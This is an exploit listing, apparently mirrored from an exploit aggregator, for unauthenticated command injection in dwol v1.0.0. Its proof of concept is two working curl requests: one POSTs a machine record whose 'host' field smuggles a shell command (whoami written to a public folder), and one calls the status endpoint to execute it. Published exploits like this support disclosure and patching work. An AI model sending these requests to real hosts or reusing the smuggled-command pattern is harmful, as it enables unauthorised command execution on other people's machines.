Share
## https://sploitus.com/exploit?id=PACKETSTORM:219284
# Exploit Title: dwol v1.0.0 - Unauthenticated Command Injection
    # Date: 2026-04-18
    # Exploit Author: Chokri Hammedi
    # Vendor Homepage: https://github.com/dhjz/dwol
    # Software Link:
    https://github.com/dhjz/dwol/releases/download/1.0.0/dwol.exe.zip
    # Version: 1.0.0
    # Tested on: Windows 10, Windows 11
    
    
    # Description:
    dwol v1.0.0 is vulnerable to unauthenticated command injection
    vulnerability in the 'host'
    parameter of the /api/machines endpoint.
    
    
    
    # Proof of Concept:
    
    Step 1: Add a malicious machine with an injected command
    curl -X POST "http://TARGET_IP:999/api/machines" -H "Content-Type:
    application/json" -d
    '{"id":"rce","name":"rce","mac":"00:11:22:33:44:55","host":"127.0.0.1 &
    whoami > C:\\users\\Public\\whoami.txt","port":9}'
    
    Step 2: Trigger the command execution
    curl "http://TARGET_IP:999/api/status"
    
    file is created in C:\\users\\Public\\